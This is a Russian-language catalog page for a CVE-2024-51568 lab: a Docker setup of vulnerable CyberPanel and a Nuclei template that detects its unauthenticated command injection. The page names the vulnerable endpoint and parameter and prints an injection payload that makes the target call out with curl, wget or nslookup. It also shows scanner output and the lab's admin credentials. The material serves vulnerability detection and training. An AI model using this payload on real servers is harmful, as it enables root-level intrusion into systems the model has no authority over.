Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template — Среда PoC и шаблон Nuclei для тестирования CVE-2024-51568, уязвимость внедрения команд до аутентификации в CyberPanel, позволяющая выполнение удалённого кода с привилегиями root. | Kitploit
Инструменты/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеЛаборатории и Практика
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

Среда PoC и шаблон Nuclei для тестирования CVE-2024-51568, уязвимость внедрения команд до аутентификации в CyberPanel, позволяющая выполнение удалённого кода с привилегиями root.

Репозиторий
1131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-51568 - PoC инъекции команд в CyberPanel

Среда для подтверждения концепции и шаблон Nuclei для тестирования CVE-2024-51568, критической уязвимости инъекции команд без аутентификации в CyberPanel.

Детали уязвимости

  • CVE: CVE-2024-51568
  • Критичность: Критическая (CVSS 9.8)
  • Тип: Инъекция команд без аутентификации
  • Эндпоинт: /filemanager/upload
  • Параметр: completePath
  • Воздействие: Удаленное выполнение кода с привилегиями root

Быстрый старт

1. Запуск уязвимой среды

root@kitploit:~
cd docker/
docker-compose up -d --build

2. Проверка работы CyberPanel

root@kitploit:~
curl -I http://localhost:8090

3. Тестирование уязвимости

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

Пример вывода:

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] шаблоны nuclei не установлены, устанавливаю...
[INF] Шаблоны nuclei успешно установлены в /root/nuclei-templates
[WRN] Загружается 1 неподписанный шаблон для сканирования. Используйте с осторожностью.
[INF] Текущая версия nuclei: v3.4.10 (последняя)
[INF] Текущая версия nuclei-templates: v10.2.8 (последняя)
[INF] В последнем выпуске добавлено 114 новых шаблонов
[INF] Загружено шаблонов для текущего сканирования: 1
[INF] Загружено целей для текущего сканирования: 1
[INF] Используется сервер Interactsh: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Сканирование завершено за 5.706766772 с. Найдено 1 совпадение.

Как это работает

Уязвимость

CyberPanel v2.3.4 содержит ошибку инъекции команд в функциональности загрузки файлов:

  1. Эндпоинт: POST /filemanager/upload
  2. Параметр: completePath в многокомпонентных данных формы
  3. Инъекция: Команды выполняются через ProcessUtilities.outputExecutioner()
  4. Обход: Аутентификация не требуется из-за обхода в middleware

Шаблон Nuclei:

  1. Извлекает CSRF-токен из начального GET-запроса
  2. Отправляет вредоносную загрузку файла с инъецированной командой в completePath
  3. Использует Interactsh для внеполосного обнаружения (HTTP/DNS обратные вызовы)
  4. Обнаруживает успешное выполнение, когда сервер обращается к URL Interactsh

Полезная нагрузка обнаружения

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

Эта полезная нагрузка обеспечивает надежное обнаружение в различных конфигурациях системы.

Конфигурация

Доступ к CyberPanel

  • URL: http://localhost:8090
  • Администратор: admin
  • Пароль: 1234567

Ссылки

  • Оригинальное исследование
  • Модуль Metasploit
  • Детали CVE

Уведомление о безопасности

Эта среда содержит намеренные уязвимости для целей исследования безопасности и обучения:

  • НЕ разворачивайте в производственной среде
  • НЕ открывайте доступ к публичным сетям
  • НЕ используйте на системах, которые вам не принадлежат
  • Используйте ТОЛЬКО для авторизованного тестирования безопасности

Отказ от ответственности

Это подтверждение концепции предоставлено только для образовательных целей и авторизованного тестирования безопасности. Пользователи несут ответственность за соблюдение применимых законов и получение надлежащего разрешения перед тестированием.

Скачать инструмент